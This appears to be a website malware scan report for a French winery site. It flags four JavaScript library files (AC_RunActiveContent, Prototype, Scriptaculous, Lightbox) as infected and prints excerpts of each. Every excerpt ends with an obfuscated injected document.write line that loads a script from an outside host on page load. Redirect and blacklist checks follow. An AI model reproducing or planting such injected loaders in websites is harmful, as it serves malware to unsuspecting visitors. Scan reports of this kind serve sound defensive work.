Scanned pages/files
Request | Server response | Status |
http://tour-des-chenes.com/ | 200 OK Content-Length: 6438 Content-Type: text/html | clean |
http://tour-des-chenes.com/appelation.htm | 200 OK Content-Length: 6169 Content-Type: text/html | clean |
http://tour-des-chenes.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 3341 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; } function AC_Generateobj(objAttrs, params, embedAttrs) { var str = '<object '; for (var i in objAttrs) str += i + '="' + objAttrs[i] + '" '; str += '>'; for (var i in params) str += '<param name="' + i + '" value="' + params[i] + '" /> '; str += '<embed '; for ( case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } document.write('<s'+'cript type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></scr'+'ipt>'); Antivirus reports:
| ||
http://tour-des-chenes.com/vignoble.htm | 200 OK Content-Length: 4666 Content-Type: text/html | clean |
http://tour-des-chenes.com/cepages.htm | 200 OK Content-Length: 6850 Content-Type: text/html | clean |
http://tour-des-chenes.com/cuvees.htm | 200 OK Content-Length: 7252 Content-Type: text/html | clean |
http://tour-des-chenes.com/temoignages.htm | 200 OK Content-Length: 4664 Content-Type: text/html | clean |
http://tour-des-chenes.com/lightbox/js/prototype.js | 200 OK Content-Length: 47711 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Prototype = { Version: '1.4.0', ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)', emptyFunction: function() {}, K: function(x) {return x} } var Class = { create: function() { return function() { this.initialize.apply(this, arguments); } } } var Abstract = new Object(); Object.extend = function(destination, source) { for (property in source) { destination[property] = source[ do { valueT += element.offsetTop || 0; valueL += element.offsetLeft || 0; if (element.offsetParent == document.body) if (Element.getStyle(element, 'position') == 'absolute') break; element = element.offsetParent; } while (element); return [valueL, valueT]; } } document.write('<s'+'cript type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></scr'+'ipt>'); Antivirus reports:
| ||
http://tour-des-chenes.com/lightbox/js/scriptaculous.js?load=effects | 200 OK Content-Length: 2260 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Scriptaculous = { Version: '1.5.1', require: function(libraryName) { document.write('<script type="text/javascript" src="'+libraryName+'"></script>'); }, load: function() { if((typeof Prototype=='undefined') || parseFloat(Prototype.Version.split(".")[0] + "." + Prototype.Version.split(".")[1]) < 1.4) throw("script.aculo.us requires the Prototype JavaScript framework >= 1.4.0"); var path = s.src.replace(/scriptaculous\.js(\?.*)?$/,''); var includes = s.src.match(/\?.*load=([a-z,]*)/); (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider').split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); }); } } Scriptaculous.load(); document.write('<s'+'cript type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></scr'+'ipt>'); Antivirus reports:
| ||
http://tour-des-chenes.com/lightbox/js/lightbox.js | 200 OK Content-Length: 20141 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var fileLoadingImage = "../lightbox/images/loading.gif"; var fileBottomNavCloseImage = "../lightbox/images/close.gif"; var resizeSpeed = 7; var borderSize = 10; var imageArray = new Array; var activeImage; if(resizeSpeed > 10){ resizeSpeed = 10;} if(resizeSpeed < 1){ resizeSpeed = 1;} resizeDuration = (11 - resizeSpeed) * 0.15; Object.extend(Element, { getWidth: function(element) { element = $(element); return element.offsetWid } } function pause(numberMillis) { var now = new Date(); var exitTime = now.getTime() + numberMillis; while (true) { now = new Date(); if (now.getTime() > exitTime) return; } } function initLightbox() { myLightbox = new Lightbox(); } Event.observe(window, 'load', initLightbox, false); document.write('<s'+'cript type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></scr'+'ipt>'); Antivirus reports:
| ||
http://tour-des-chenes.com/batiment.htm | 200 OK Content-Length: 6241 Content-Type: text/html | clean |
http://tour-des-chenes.com/salles.htm | 200 OK Content-Length: 5725 Content-Type: text/html | clean |
http://tour-des-chenes.com/cave.htm | 200 OK Content-Length: 5953 Content-Type: text/html | clean |
http://tour-des-chenes.com/jardins.htm | 200 OK Content-Length: 5707 Content-Type: text/html | clean |
http://tour-des-chenes.com/services_r.htm | 200 OK Content-Length: 5940 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tour-des-chenes.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 14:03:40 GMT
Server: Apache/2.2.3 (Debian) mod_ssl/2.2.3 OpenSSL/0.9.8c
Content-Language: fr
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: PHP/5.2.9
GET / HTTP/1.1
Host: tour-des-chenes.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 14:03:40 GMT
Server: Apache/2.2.3 (Debian) mod_ssl/2.2.3 OpenSSL/0.9.8c
Content-Language: fr
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: PHP/5.2.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: tour-des-chenes.com
Referer: http://www.google.com/search?q=tour-des-chenes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tour-des-chenes.com
Referer: http://www.google.com/search?q=tour-des-chenes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tour-des-chenes.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tour-des-chenes.com/
Result: tour-des-chenes.com is not infected or malware details are not published yet.
Result: tour-des-chenes.com is not infected or malware details are not published yet.